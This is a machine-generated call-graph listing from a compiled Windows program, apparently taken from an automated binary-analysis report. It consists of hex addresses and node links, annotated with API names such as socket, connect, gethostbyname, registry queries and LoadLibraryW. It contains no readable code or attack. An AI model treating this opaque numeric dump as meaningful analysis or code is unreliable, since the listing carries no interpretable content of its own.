1ec544 101616->101637 101622 1ec4f4 101617->101622 101623 1ec4e2 101617->101623 101628 1ec6a4 101618->101628 101635 17f72a 101618->101635 101648 17f741 101618->101648 101619 17fa40 417 API calls 101640 17f787 101619->101640 101621 1ec253 101620->101621 101620->101640 102278 1bd520 86 API calls 4 library calls 101621->102278 102286 1cc235 417 API calls Mailbox 101622->102286 102239 1cf34f 101623->102239 101624 1ec585 101638 1ec5a4 101624->101638 101639 1ec590 101624->101639 101629 17c935 48 API calls 101628->101629 101629->101648 101630 1ec264 101630->101593 101631 1ec507 101633 1ec50b 101631->101633 101631->101648 102287 1bd520 86 API calls 4 library calls 101633->102287 101635->101648 102317 1aa599 InterlockedDecrement 101635->102317 101636 17f9d8 102284 1bd520 86 API calls 4 library calls 101636->102284 101637->101624 101653 1ec569 101637->101653 102289 1cd154 48 API calls 101638->102289 101643 1cf34f 417 API calls 101639->101643 101640->101619 101640->101636 101641 17f770 Mailbox 101640->101641 101646 17f8bb 101640->101646 101652 17f84a 101640->101652 101664 192241 48 API calls 101640->101664 101641->101593 101642 1ec45a 101645 17c935 48 API calls 101642->101645 101643->101648 101645->101648 101646->101630 101646->101642 101646->101648 102283 1aa599 InterlockedDecrement 101646->102283 102285 1cf4df 417 API calls 101646->102285 101648->101641 101649 1ec7b5 101648->101649 102318 1cee52 82 API calls 2 library calls 101648->102318 101651 1ec7eb 101649->101651 102339 1cef9d 90 API calls Mailbox 101649->102339 101650 1ec5af 101670 1ec62c 101650->101670 101672 1ec5d1 101650->101672 101658 17d89e 50 API calls 101651->101658 101657 1ec32a 101652->101657 101667 17f854 101652->101667 102288 1bd520 86 API calls 4 library calls 101653->102288 102279 17342c 101657->102279 101658->101641 101660 1ec793 102319 1784a6 101660->102319 101661 1ec7c9 101665 1784a6 81 API calls 101661->101665 101664->101640 101676 1ec7d1 __wsetenvp 101665->101676 102262 1814a0 101667->102262 101669 17f8ab 101669->101636 101669->101646 102314 1bafce 48 API calls 101670->102314 101671 1ec79b __wsetenvp 101671->101649 101678 17d89e 50 API calls 101671->101678 102290 1ba485 48 API calls 101672->102290 101674 1ec63e 102315 18df08 48 API calls 101674->102315 101676->101651 101680 17d89e 50 API calls 101676->101680 101678->101649 101679 1ec5f6 102291 1844e0 101679->102291 101680->101651 101681 1ec647 Mailbox 102316 1ba485 48 API calls 101681->102316 101684 1ec663 101685 183680 417 API calls 101684->101685 101685->101648 101687 17fa60 101686->101687 101721 17fa8e Mailbox _memmove 101686->101721 101688 19010a 48 API calls 101687->101688 101688->101721 101689 18105e 101690 17c935 48 API calls 101689->101690 101708 17fbf1 Mailbox 101690->101708 101691 180119 103226 1bd520 86 API calls 4 library calls 101691->103226 101694 181063 103225 1bd520 86 API calls 4 library calls 101694->103225 101695 17c935 48 API calls 101695->101721 101697 180dee 101701 17d89e 50 API calls 101697->101701 101698 191b2a 52 API calls __cinit 101698->101721 101699 1eb772 103227 1bd520 86 API calls 4 library calls 101699->103227 101700 180dfa 101705 17d89e 50 API calls 101700->101705 101701->101700 101703 19010a 48 API calls 101703->101721 101704 17f6d0 417 API calls 101704->101721 101707 180e83 101705->101707 101706 17d3d2 48 API calls 101706->101721 101712 17caee 48 API calls 101707->101712 101708->101593 101710 1eb7d2 101711 1aa599 InterlockedDecrement 101711->101721 101719 1810f1 Mailbox 101712->101719 101714 181230 101714->101708 103224 1bd520 86 API calls 4 library calls 101714->103224 101717 17fa40 417 API calls 101717->101721 103223 1bd520 86 API calls 4 library calls 101719->103223 101721->101689 101721->101691 101721->101694 101721->101695 101721->101697 101721->101698 101721->101699 101721->101700 101721->101703 101721->101704 101721->101706 101721->101707 101721->101708 101721->101711 101721->101714 101721->101717 101721->101719 101722 1eb583 101721->101722 101724 1c013f 87 API calls 101721->101724 101725 1d1f19 132 API calls 101721->101725 101726 18f03e 2 API calls 101721->101726 101727 1d0bfa 129 API calls 101721->101727 101728 1d30ad 93 API calls 101721->101728 101729 1d798d 109 API calls 101721->101729 101730 1781c6 85 API calls 101721->101730 101731 1c936f 55 API calls 101721->101731 101732 1d804e 113 API calls 101721->101732 101733 1750a3 49 API calls 101721->101733 101734 18ef0d 94 API calls 101721->101734 101735 1cb74b 417 API calls 101721->101735 101736 1d17aa 87 API calls 101721->101736 101737 1d10e5 82 API calls 101721->101737 101738 18f461 98 API calls 101721->101738 101739 1c8065 55 API calls 101721->101739 101740 1bbe47 50 API calls 101721->101740 101741 18dd84 3 API calls 101721->101741 101742 1c92c0 88 API calls 101721->101742 101743 1c9122 91 API calls 101721->101743 103217 181620 59 API calls Mailbox 101721->103217 103218 1cee52 82 API calls 2 library calls 101721->103218 103219 1cef9d 90 API calls Mailbox 101721->103219 103220 1bb020 48 API calls 101721->103220 103221 1ce713 417 API calls Mailbox 101721->103221 103222 1bd520 86 API calls 4 library calls 101722->103222 101724->101721 101725->101721 101726->101721 101727->101721 101728->101721 101729->101721 101730->101721 101731->101721 101732->101721 101733->101721 101734->101721 101735->101721 101736->101721 101737->101721 101738->101721 101739->101721 101740->101721 101741->101721 101742->101721 101743->101721 101745 1c015e 101744->101745 101746 1c0157 101744->101746 101747 1784a6 81 API calls 101745->101747 101748 1784a6 81 API calls 101746->101748 101747->101746 101749 1c017c 101748->101749 103228 1b76db GetFileVersionInfoSizeW 101749->103228 101751 1c018d 101752 1c0192 101751->101752 101753 1c01a3 _wcscmp 101751->101753 101754 17ca8e 48 API calls 101752->101754 101756 17ca8e 48 API calls 101753->101756 101755 1c01a1 101754->101755 101755->101593 101756->101755 103244 1cf79f 101757->103244 101759 1d0c0a 101759->101593 101761 1bbe50 101760->101761 101762 1bbe55 101760->101762 103331 1bae06 101761->103331 101762->101593 101765 1784a6 81 API calls 101764->101765 101766 1c913f 101765->101766 101767 17cdb4 48 API calls 101766->101767 101768 1c9149 101767->101768 103352 1cacd3 101768->103352 101770 1c9156 101771 1c915a socket 101770->101771 101776 1c9182 101770->101776 101772 1c916d WSAGetLastError 101771->101772 101773 1c9184 connect 101771->101773 101772->101776 101774 1c91a3 WSAGetLastError 101773->101774 101773->101776 103358 1bd7e4 101774->103358 101776->101593 101777 1c91b8 closesocket 101777->101776 101779 17a6d4 48 API calls 101778->101779 101780 1c92d2 101779->101780 101781 1784a6 81 API calls 101780->101781 101782 1c92e1 101781->101782 101783 18f26b 50 API calls 101782->101783 101784 1c92ed gethostbyname 101783->101784 101785 1c931d _memmove 101784->101785 101786 1c92fa WSAGetLastError 101784->101786 101788 1c932d inet_ntoa 101785->101788 101787 1c930e 101786->101787 101790 17ca8e 48 API calls 101787->101790 103373 1cadca 48 API calls 2 library calls 101788->103373 101795 1c931b Mailbox 101790->101795 101791 1c9342 103374 1cae5a 50 API calls 101791->103374 101793 1c934e 103375 177bef 101793->103375 101795->101593 101797 18f0b5 2 API calls 101796->101797 101798 18f046 101797->101798 101798->101593 103381 1719ee 101799->103381 101803 1d79a4 101803->101593 101805 17ca8e 48 API calls 101804->101805 101806 1d30ca 101805->101806 101807 17d3d2 48 API calls 101806->101807 101808 1d30d3 101807->101808 101809 17d3d2 48 API calls 101808->101809 101810 1d30dc 101809->101810 101811 17d3d2 48 API calls 101810->101811 101812 1d30e5 101811->101812 101813 1784a6 81 API calls 101812->101813 101814 1d30f4 101813->101814 101815 1d3d7b 48 API calls 101814->101815 101816 1d3128 101815->101816 101817 1d3af7 49 API calls 101816->101817 101818 1d3159 101817->101818 101819 1d319c RegOpenKeyExW 101818->101819 101820 1d3172 RegConnectRegistryW 101818->101820 101829 1d315d Mailbox 101818->101829 101822 1d31c5 101819->101822 101823 1d31f7 101819->101823 101820->101819 101820->101829 101826 1d31d9 RegCloseKey 101822->101826 101822->101829 101824 1784a6 81 API calls 101823->101824 101825 1d3207 RegQueryValueExW 101824->101825 101827 1d3229 101825->101827 101828 1d323e 101825->101828 101826->101829 101832 1d34eb RegCloseKey 101827->101832 101828->101827 101830 1d344c 101828->101830 101831 1d3265 101828->101831 101829->101593 101835 19010a 48 API calls 101830->101835 101833 1d326e 101831->101833 101834 1d33d9 101831->101834 101832->101829 101836 1d34fe RegCloseKey 101832->101836 101838 1d338d 101833->101838 101839 1d3279 101833->101839 103505 1bad14 48 API calls _memset 101834->103505 101840 1d3464 101835->101840 101836->101829 101844 1784a6 81 API calls 101838->101844 101843 1d32de 101839->101843 101847 1d327e 101839->101847 101841 1784a6 81 API calls 101840->101841 101845 1d3479 RegQueryValueExW 101841->101845 101842 1d33e4 101846 1784a6 81 API calls 101842->101846 101849 19010a 48 API calls 101843->101849 101848 1d33a1 RegQueryValueExW 101844->101848 101845->101827 101857 1d3331 101845->101857 101851 1d33f6 RegQueryValueExW 101846->101851 101847->101827 101852 1784a6 81 API calls 101847->101852 101848->101827 101850 1d32f7 101849->101850 101853 1784a6 81 API calls 101850->101853 101851->101827 101851->101832 101854 1d329f RegQueryValueExW 101852->101854 101855 1d330c RegQueryValueExW 101853->101855 101854->101827 101855->101827 101855->101857 101856 17ca8e 48 API calls 101856->101827 101857->101856 101859 17cdb4 48 API calls 101858->101859 101860 1c938a 101859->101860 101861 17cdb4 48 API calls 101860->101861 101862 1c939a 101861->101862 101863 17ca8e 48 API calls 101862->101863 101864 1c93a9 101863->101864 101865 1c93c2 select 101864->101865 101885 1c93ae Mailbox _memmove 101864->101885 101866 1c941f 101865->101866 101867 1c9414 WSAGetLastError 101865->101867 101868 19010a 48 API calls 101866->101868 101867->101885 101869 1c9428 101868->101869 101870 174bce 48 API calls 101869->101870 101871 1c9432 __WSAFDIsSet 101870->101871 101872 1c944a 101871->101872 101871->101885 101873 1c94f5 WSAGetLastError 101872->101873 101874 1c9463 101872->101874 101873->101885 101875 1c947b _strlen 101874->101875 101876 17cdb4 48 API calls 101874->101876 101874->101885 101877 1c94be 101875->101877 101878 1c948e 101875->101878 101876->101875 103508 1bad14 48 API calls _memset 101877->103508 103506 1ae0f5 48 API calls 2 library calls 101878->103506 101881 1c9497 103507 1cae5a 50 API calls 101881->103507 101883 1c94a3 101884 177bef 48 API calls 101883->101884 101884->101885 101885->101593 101887 1784a6 81 API calls 101886->101887 101888 1781e5 101887->101888 101889 1784a6 81 API calls 101888->101889 101890 1781fa 101889->101890 101891 1784a6 81 API calls 101890->101891 101892 17820d 101891->101892 101893 1784a6 81 API calls 101892->101893 101894 178223 101893->101894 101895 177b6e 48 API calls 101894->101895 101896 178237 101895->101896 101897 17cdb4 48 API calls 101896->101897 101951 17846a 101896->101951 101898 17825e 101897->101898 101899 1ed752 101898->101899 101924 178281 __wopenfile 101898->101924 101898->101951 101902 173320 48 API calls 101899->101902 101900 1ed91e 101904 173320 48 API calls 101900->101904 101901 1ed95f 101903 173320 48 API calls 101901->101903 101905 1ed769 101902->101905 101906 1ed96a 101903->101906 101907 1ed928 101904->101907 101932 1ed790 101905->101932 103515 182320 50 API calls 101905->103515 103522 182320 50 API calls 101906->103522 101908 1784a6 81 API calls 101907->101908 101910 1ed93a 101908->101910 103521 1780ea 48 API calls _memmove 101910->103521 101912 1784a6 81 API calls 101915 178306 101912->101915 101913 1ed985 101921 1784a6 81 API calls 101913->101921 101918 1784a6 81 API calls 101915->101918 101917 1ed94e 101919 178182 48 API calls 101917->101919 101920 17831b 101918->101920 101925 1ed95c 101919->101925 101922 1ed7ed 101920->101922 101928 178342 101920->101928 101920->101951 101926 1ed9a0 101921->101926 101931 173320 48 API calls 101922->101931 101922->101951 101923 178182 48 API calls 101923->101932 101924->101912 101924->101922 101944 178364 101924->101944 101924->101951 103524 182320 50 API calls 101925->103524 103523 1780ea 48 API calls _memmove 101926->103523 101934 173320 48 API calls 101928->101934 101930 1ed9b4 101935 178182 48 API calls 101930->101935 101936 1ed84a 101931->101936 101932->101923 101937 17843f Mailbox 101932->101937 103516 1780ea 48 API calls _memmove 101932->103516 103517 182320 50 API calls 101932->103517 101938 17834c 101934->101938 101935->101925 103518 182320 50 API calls 101936->103518 101937->101593 101939 17c4cd 48 API calls 101938->101939 101939->101944 101944->101937 101946 1ed895 101944->101946 103509 19247b 59 API calls 2 library calls 101944->103509 103510 1780ea 48 API calls _memmove 101944->103510 103511 178182 101944->103511 103514 182320 50 API calls 101944->103514 101945 1ed8ce 101947 178182 48 API calls 101945->101947 101946->101945 101948 1ed8bf 101946->101948 101949 1ed8dc 101947->101949 103519 17bd2f 48 API calls _memmove 101948->103519 103520 182320 50 API calls 101949->103520 101951->101900 101951->101901 101953 1ed8ee 101955 17c4cd 48 API calls 101953->101955 101955->101951 103525 18dd92 GetFileAttributesW 101956->103525 101960 19010a 48 API calls 101959->101960 101961 1750b3 101960->101961 101962 1750ec CloseHandle 101961->101962 101963 1750be 101962->101963 101963->101593 103530 1c6b19 101964->103530 101967 1c80a5 101968 173320 48 API calls 101967->101968 101969 1c80b3 101968->101969 103535 182320 50 API calls 101969->103535 101970 1c8102 101972 17cdb4 48 API calls 101970->101972 101977 1c80f5 101970->101977 101974 1c812b 101972->101974 101973 1c80cf 103536 182320 50 API calls 101973->103536 101976 17cdb4 48 API calls 101974->101976 101974->101977 101976->101977 101977->101593 101979 1719ee 83 API calls 101978->101979 101980 1d8062 101979->101980 101981 171dce 107 API calls 101980->101981 101982 1d806b 101981->101982 101983 1d8091 101982->101983 101984 1d806f 101982->101984 101985 17d3d2 48 API calls 101983->101985 101986 17ca8e 48 API calls 101984->101986 101987 1d809a 101985->101987 101991 1d808f Mailbox 101986->101991 103537 1ae2e8 101987->103537 101989 1d80aa 101990 177bef 48 API calls 101989->101990 101990->101991 101991->101593 101993 17ca8e 48 API calls 101992->101993 101994 1cb7a3 CoInitialize 101993->101994 101995 1cb7ae CoUninitialize 101994->101995 101996 1cb7b4 101994->101996 101995->101996 101997 1cb7d5 101996->101997 101998 17ca8e 48 API calls 101996->101998 101999 1cb81b 101997->101999 102000 1784a6 81 API calls 101997->102000 101998->101997 102001 1784a6 81 API calls 101999->102001 102002 1cb7ef 102000->102002 102003 1cb827 102001->102003 103581 1aa857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 102002->103581 102006 1cb9d3 SetErrorMode CoGetInstanceFromFile 102003->102006 102017 1cb861 102003->102017 102005 1cb802 102005->101999 102007 1cb807 102005->102007 102009 1cba1f CoGetObject 102006->102009 102010 1cba19 SetErrorMode 102006->102010 103582 1cc235 417 API calls Mailbox 102007->103582 102008 1cb8a8 GetRunningObjectTable 102014 1cb8b8 102008->102014 102015 1cb8cb 102008->102015 102009->102010 102013 1cbaa8 102009->102013 102019 1cb9b1 102010->102019 103587 1cc235 417 API calls Mailbox 102013->103587 102014->102015 102032 1cb8ed 102014->102032 103583 1cc235 417 API calls Mailbox 102015->103583 102017->102008 102024 17cdb4 48 API calls 102017->102024 102030 1cb89a 102017->102030 102019->102013 102023 1cba53 102019->102023 102020 1cbad0 VariantClear 102020->101593 102021 1cb814 Mailbox 102021->102020 102022 1cbac2 SetErrorMode 102022->102021 102028 1cba6f 102023->102028 103585 1aac4b 51 API calls Mailbox 102023->103585 102027 1cb88a 102024->102027 102029 17cdb4 48 API calls 102027->102029 102027->102030 103586 1ba6f6 103 API calls 102028->103586 102029->102030 102030->102008 102032->102019 103584 1aac4b 51 API calls Mailbox 102032->103584 102034 17ca8e 48 API calls 102033->102034 102035 18ef25 102034->102035 102036 18effb 102035->102036 102037 18ef3e 102035->102037 102038 19010a 48 API calls 102036->102038 103611 18f0f3 48 API calls 102037->103611 102040 18f002 102038->102040 102041 18f00e 102040->102041 103613 175080 49 API calls 102040->103613 102043 1784a6 81 API calls 102041->102043 102049 18f01c 102043->102049 102044 18ef4d 102045 18ef73 102044->102045 102047 1e6942 102044->102047 102048 17cdb4 48 API calls 102044->102048 102046 18f03e 2 API calls 102045->102046 102050 18ef7a 102046->102050 102047->101593 102051 1e6965 102048->102051 102052 174bf9 56 API calls 102049->102052 102053 1e6980 102050->102053 102054 18ef87 102050->102054 102051->102045 102055 1e696d 102051->102055 102056 18f02b 102052->102056 102058 19010a 48 API calls 102053->102058 102059 17d3d2 48 API calls 102054->102059 102060 17cdb4 48 API calls 102055->102060 102056->102044 102057 1e6936 102056->102057 102057->102047 103614 174592 CloseHandle 102057->103614 102061 1e6986 102058->102061 102062 18ef8f 102059->102062 102060->102050 102063 1e699f 102061->102063 103615 173d65 ReadFile SetFilePointerEx 102061->103615 103588 18f04e 102062->103588 102070 1e69a3 _memmove 102063->102070 103616 1bad14 48 API calls _memset 102063->103616 102067 18ef9e 102069 177bef 48 API calls 102067->102069 102067->102070 102071 18efb2 Mailbox 102069->102071 102072 18eff2 102071->102072 102073 1750ec CloseHandle 102071->102073 102072->101593 102074 18efe4 102073->102074 103612 174592 CloseHandle 102074->103612 102077 1784a6 81 API calls 102076->102077 102078 1d10fb LoadLibraryW 102077->102078 102079 1d111e 102078->102079 102080 1d110f 102078->102080 102079->102080 103640 1d28d9 48 API calls _memmove 102079->103640 102080->101593 103641 1d23c5 102082->103641 102086 1784a6 81 API calls 102085->102086 102087 1d17c7 102086->102087 102088 1b6f5b 63 API calls 102087->102088 102089 1d17d8 102088->102089 102089->101593 102091 18f48a 102090->102091 102092 18f47f 102090->102092 102095 1784a6 81 API calls 102091->102095 102117 18f498 Mailbox 102091->102117 102093 17cdb4 48 API calls 102092->102093 102093->102091 102094 19010a 48 API calls 102096 18f49f 102094->102096 102097 1e6841 102095->102097 102098 18f4af 102096->102098 103725 175080 49 API calls 102096->103725 102099 19297d __wsplitpath 47 API calls 102097->102099 102102 1784a6 81 API calls 102098->102102 102101 1e6859 102099->102101 102103 17caee 48 API calls 102101->102103 102104 18f4bf 102102->102104 102106 1e686a 102103->102106 102105 174bf9 56 API calls 102104->102105 102107 18f4ce 102105->102107 103726 1739e8 48 API calls 2 library calls 102106->103726 102109 1e68d4 GetLastError 102107->102109 102121 18f4d6 102107->102121 102112 1e68ed 102109->102112 102110 1e6878 102111 1e6895 102110->102111 103727 1b6f4b GetFileAttributesW FindFirstFileW FindClose 102110->103727 102113 17cdb4 48 API calls 102111->102113 102112->102121 103728 174592 CloseHandle 102112->103728 102113->102117 102114 18f4f0 102118 19010a 48 API calls 102114->102118 102115 1e6920 102119 19010a 48 API calls 102115->102119 102117->102094 102127 18f50a Mailbox 102117->102127 102122 18f4f5 102118->102122 102123 1e6925 102119->102123 102120 1e6888 102120->102111 102126 1b6d6d 52 API calls 102120->102126 102121->102114 102121->102115 102125 17197e 48 API calls 102122->102125 102125->102127 102126->102111 102127->101593 102129 18e022 102128->102129 102130 18e034 102128->102130 102131 17d89e 50 API calls 102129->102131 102132 18e03a 102130->102132 102133 18e063 102130->102133 102136 18e02c 102131->102136 102134 19010a 48 API calls 102132->102134 102135 17d89e 50 API calls 102133->102135 102134->102136 102135->102136 102136->101549 103729 17a9a0 102137->103729 102139 1836e7 102140 183778 102139->102140 102141 1ea269 102139->102141 102197 183aa8 102139->102197 103741 18bc04 86 API calls 102140->103741 103746 1bd520 86 API calls 4 library calls 102141->103746 102146 18bc5c 48 API calls 102199 18396b Mailbox _memmove 102146->102199 102147 1ea3e9 103757 1bd520 86 API calls 4 library calls 102147->103757 102148 183793 102148->102197 102148->102199 102201 1ea68d 102148->102201 103734 1710e8 102148->103734 102152 1ea583 102155 17fa40 417 API calls 102152->102155 102153 1ea45c 103761 1bd520 86 API calls 4 library calls 102153->103761 102154 1ea289 102154->102147 103747 17d2d2 102154->103747 102158 1ea5b5 102155->102158 102168 17d380 55 API calls 102158->102168 102158->102197 102160 18384e 102165 1ea60c 102160->102165 102166 1838e5 102160->102166 102160->102199 102162 1ea40f 103758 18cf79 49 API calls 102162->103758 102163 1ea303 102176 1ea317 102163->102176 102180 1ea341 102163->102180 103766 1bd231 50 API calls 102165->103766 102171 19010a 48 API calls 102166->102171 102172 1ea5e6 102168->102172 102187 1838ec 102171->102187 103765 1bd520 86 API calls 4 library calls 102172->103765 102173 17fa40 417 API calls 102173->102199 102175 1ea42c 102177 1ea44d 102175->102177 102178 1ea441 102175->102178 103753 1bd520 86 API calls 4 library calls 102176->103753 103760 1bd520 86 API calls 4 library calls 102177->103760 103759 1bd520 86 API calls 4 library calls 102178->103759 102184 1ea366 102180->102184 102188 1ea384 102180->102188 103754 1cf211 417 API calls 102184->103754 102185 17d89e 50 API calls 102185->102199 102191 17e1f0 417 API calls 102187->102191 102193 18399f 102187->102193 102189 1ea37a 102188->102189 103755 1cf4df 417 API calls 102188->103755 102189->102197 103756 18baef 48 API calls _memmove 102189->103756 102191->102199 102194 17c935 48 API calls 102193->102194 102195 1839c0 102193->102195 102194->102195 102195->102197 102200 1ea65e 102195->102200 102203 183a05 102195->102203 102196 19010a 48 API calls 102196->102199 102206 183ab5 Mailbox 102197->102206 103745 1bd520 86 API calls 4 library calls 102197->103745 102199->102146 102199->102152 102199->102153 102199->102154 102199->102172 102199->102173 102199->102185 102199->102193 102199->102196 102199->102197 103742 17d500 53 API calls __cinit 102199->103742 103743 17d420 53 API calls 102199->103743 103744 18baef 48 API calls _memmove 102199->103744 103762 1cd21a 82 API calls Mailbox 102199->103762 103763 1b89e0 53 API calls 102199->103763 103764 17d772 55 API calls 102199->103764 102202 17d89e 50 API calls 102200->102202 102201->102197 103767 1bd520 86 API calls 4 library calls 102201->103767 102202->102201 102203->102197 102203->102201 102204 183a95 102203->102204 102205 17d89e 50 API calls 102204->102205 102205->102197 102206->101593 102207->101593 102209 17d8ac 102208->102209 102213 17d8db Mailbox 102208->102213 102210 17d8ff 102209->102210 102212 17d8b2 Mailbox 102209->102212 102211 17c935 48 API calls 102210->102211 102211->102213 102214 17d8c7 102212->102214 102216 1e4e9b 102212->102216 102213->101567 102214->102213 102215 1e4e72 VariantClear 102214->102215 102215->102213 102216->102213 103771 1aa599 InterlockedDecrement 102216->103771 102219 17cafd __wsetenvp _memmove 102218->102219 102220 19010a 48 API calls 102219->102220 102221 17cb3b 102220->102221 102221->101588 102222->101593 102223->101593 102224->101593 102225->101593 102226->101556 102227->101558 102229 17c940 102228->102229 102230 17c948 102228->102230 102231 17d805 48 API calls 102229->102231 102230->101580 102231->102230 102232->101588 102233->101580 102234->101555 102235->101570 102236->101559 102237->101566 102238->101577 102340 17d3d2 102239->102340 102241 1cf389 Mailbox 102242 1cf3cd 102241->102242 102243 1cf3e1 102241->102243 102259 1cf3a9 102241->102259 102351 177e53 102242->102351 102246 17c935 48 API calls 102243->102246 102244 17d89e 50 API calls 102257 1cf421 Mailbox 102244->102257 102247 1cf3df 102246->102247 102248 1cf429 102247->102248 102360 1ccdb5 417 API calls 102247->102360 102345 1ccd12 102248->102345 102251 1cf410 102251->102248 102253 1cf414 102251->102253 102252 1cf44b 102255 1cf457 102252->102255 102256 1cf4a2 102252->102256 102361 1bd338 86 API calls 4 library calls 102253->102361 102255->102259 102260 1cf476 102255->102260 102258 1cf34f 417 API calls 102256->102258 102257->101648 102258->102257 102259->102244 102362 17ca8e 102260->102362 102263 181606 102262->102263 102266 1814b2 102262->102266 102263->101669 102265 18156d 102265->101669 102268 19010a 48 API calls 102266->102268 102276 1814be 102266->102276 102267 1814c9 102267->102265 102271 19010a 48 API calls 102267->102271 102269 1e5299 102268->102269 102270 19010a 48 API calls 102269->102270 102277 1e52a4 102270->102277 102272 1815af 102271->102272 102273 1815c2 102272->102273 102487 18d6b4 48 API calls 102272->102487 102273->101669 102275 19010a 48 API calls 102275->102277 102276->102267 102488 17346e 48 API calls 102276->102488 102277->102275 102277->102276 102278->101630 102280 173435 102279->102280 102281 173444 102279->102281 102282 19010a 48 API calls 102280->102282 102281->101646 102282->102281 102283->101646 102284->101641 102285->101646 102286->101631 102287->101641 102288->101641 102289->101650 102290->101679 102292 18469f 102291->102292 102293 184537 102291->102293 102296 17caee 48 API calls 102292->102296 102294 184543 102293->102294 102295 1e7820 102293->102295 102489 184040 102294->102489 102661 1ce713 417 API calls Mailbox 102295->102661 102303 1845e4 Mailbox 102296->102303 102299 184639 Mailbox 102299->101648 102300 1e782c 102300->102299 102662 1bd520 86 API calls 4 library calls 102300->102662 102302 184559 102302->102299 102302->102300 102302->102303 102306 1d1f19 132 API calls 102303->102306 102504 1c95af WSAStartup 102303->102504 102506 1750ec 102303->102506 102510 1d352a 102303->102510 102598 1c1080 102303->102598 102601 1c6fc3 102303->102601 102604 1bdce9 102303->102604 102609 1c9500 102303->102609 102618 18f55e 102303->102618 102627 1befcd 102303->102627 102306->102299 102314->101674 102315->101681 102316->101684 102317->101648 102318->101660 102320 1784be 102319->102320 102337 1784ba 102319->102337 102321 1784ea __itow Mailbox _wcscpy 102320->102321 102322 1e5592 __i64tow 102320->102322 102323 1784d2 102320->102323 102324 1e5494 102320->102324 102328 19010a 48 API calls 102321->102328 103215 19234b 80 API calls 3 library calls 102323->103215 102325 1e557a 102324->102325 102329 1e549d 102324->102329 103216 19234b 80 API calls 3 library calls 102325->103216 102330 1784f4 102328->102330 102329->102321 102331 1e54bc 102329->102331 102333 17caee 48 API calls 102330->102333 102330->102337 102332 19010a 48 API calls 102331->102332 102335 1e54d9 102332->102335 102333->102337 102334 19010a 48 API calls 102336 1e54ff 102334->102336 102335->102334 102336->102337 102338 17caee 48 API calls 102336->102338 102337->101671 102338->102337 102339->101661 102376 19010a 102340->102376 102342 17d3f3 102343 19010a 48 API calls 102342->102343 102344 17d401 102343->102344 102344->102241 102346 1ccd46 102345->102346 102347 1ccd21 102345->102347 102346->102252 102348 17ca8e 48 API calls 102347->102348 102349 1ccd2d 102348->102349 102407 1cc8b7 102349->102407 102352 177ecf 102351->102352 102355 177e5f __wsetenvp 102351->102355 102475 17a2fb 102352->102475 102354 177e85 _memmove 102354->102247 102356 177ec7 102355->102356 102357 177e7b 102355->102357 102474 177eda 48 API calls 102356->102474 102471 17a6f8 102357->102471 102360->102251 102361->102257 102363 17cad0 102362->102363 102366 17ca9a 102362->102366 102364 17cae3 102363->102364 102365 17cad9 102363->102365 102483 17c4cd 102364->102483 102367 177e53 48 API calls 102365->102367 102369 19010a 48 API calls 102366->102369 102373 17cac6 102367->102373 102370 17caad 102369->102370 102371 1e4f11 102370->102371 102372 17cab8 102370->102372 102371->102373 102374 17d3d2 48 API calls 102371->102374 102372->102373 102375 17caee 48 API calls 102372->102375 102373->102257 102374->102373 102375->102373 102377 190112 __calloc_impl 102376->102377 102379 19012c 102377->102379 102380 19012e std::exception::exception 102377->102380 102385 1945ec 102377->102385 102379->102342 102399 197495 RaiseException 102380->102399 102382 190158 102400 1973cb 47 API calls _free 102382->102400 102384 19016a 102384->102342 102386 194667 __calloc_impl 102385->102386 102393 1945f8 __calloc_impl 102385->102393 102406 19889e 47 API calls __getptd_noexit 102386->102406 102389 19462b RtlAllocateHeap 102390 19465f 102389->102390 102389->102393 102390->102377 102392 194653 102404 19889e 47 API calls __getptd_noexit 102392->102404 102393->102389 102393->102392 102394 194603 102393->102394 102397 194651 102393->102397 102394->102393 102401 198e52 47 API calls 2 library calls 102394->102401 102402 198eb2 47 API calls 8 library calls 102394->102402 102403 191d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 102394->102403 102405 19889e 47 API calls __getptd_noexit 102397->102405 102399->102382 102400->102384 102401->102394 102402->102394 102404->102397 102405->102390 102406->102390 102409 1cc914 102407->102409 102410 1cc8f7 102407->102410 102465 1cc235 417 API calls Mailbox 102409->102465 102410->102409 102411 1ccc61 102410->102411 102412 1cc934 102410->102412 102413 1ccc6e 102411->102413 102414 1ccca9 102411->102414 102412->102409 102443 1aabf3 102412->102443 102461 18d6b4 48 API calls 102413->102461 102414->102409 102417 1cccb6 102414->102417 102416 1cc964 102416->102409 102418 1cc973 102416->102418 102463 18d6b4 48 API calls 102417->102463 102430 1cc9a1 102418->102430 102447 1aa8c8 102418->102447 102420 1ccc87 102462 1b97b6 89 API calls 102420->102462 102424 1cccd6 102464 1b503c 91 API calls Mailbox 102424->102464 102440 1ccc52 102440->102346 102444 1aac04 __wsetenvp 102443->102444 102446 1aac16 102443->102446 102444->102446 102466 173bcf 102444->102466 102446->102416 102461->102420 102462->102440 102463->102424 102464->102440 102465->102440 102467 173bd9 __wsetenvp 102466->102467 102468 19010a 48 API calls 102467->102468 102472 19010a 48 API calls 102471->102472 102473 17a702 102472->102473 102473->102354 102474->102354 102476 17a309 102475->102476 102478 17a321 _memmove 102475->102478 102476->102478 102479 17b8a7 102476->102479 102478->102354 102480 17b8ba 102479->102480 102482 17b8b7 _memmove 102479->102482 102481 19010a 48 API calls 102480->102481 102481->102482 102482->102478 102484 17c4e7 102483->102484 102486 17c4da 102483->102486 102485 19010a 48 API calls 102484->102485 102485->102486 102486->102373 102487->102273 102488->102267 102490 1e787b 102489->102490 102493 18406c 102489->102493 102664 1bd520 86 API calls 4 library calls 102490->102664 102492 1e788c 102665 1bd520 86 API calls 4 library calls 102492->102665 102493->102492 102498 1840a6 _memmove 102493->102498 102496 1841f1 102496->102302 102497 19010a 48 API calls 102497->102498 102498->102497 102499 17fa40 417 API calls 102498->102499 102500 184185 102498->102500 102501 1e78d8 102498->102501 102503 184175 102498->102503 102499->102498 102500->102302 102666 1bd520 86 API calls 4 library calls 102501->102666 102503->102500 102663 1cd21a 82 API calls Mailbox 102503->102663 102505 1c95e0 102504->102505 102505->102299 102507 1750f6 102506->102507 102508 175105 102506->102508 102507->102299 102508->102507 102509 17510a CloseHandle 102508->102509 102509->102507 102511 17d3d2 48 API calls 102510->102511 102512 1d354a 102511->102512 102513 17d3d2 48 API calls 102512->102513 102514 1d3553 102513->102514 102515 17d3d2 48 API calls 102514->102515 102516 1d355c 102515->102516 102517 1784a6 81 API calls 102516->102517 102525 1d35e9 Mailbox 102516->102525 102518 1d3580 102517->102518 102667 1d3d7b 102518->102667 102525->102299 102747 1c22e5 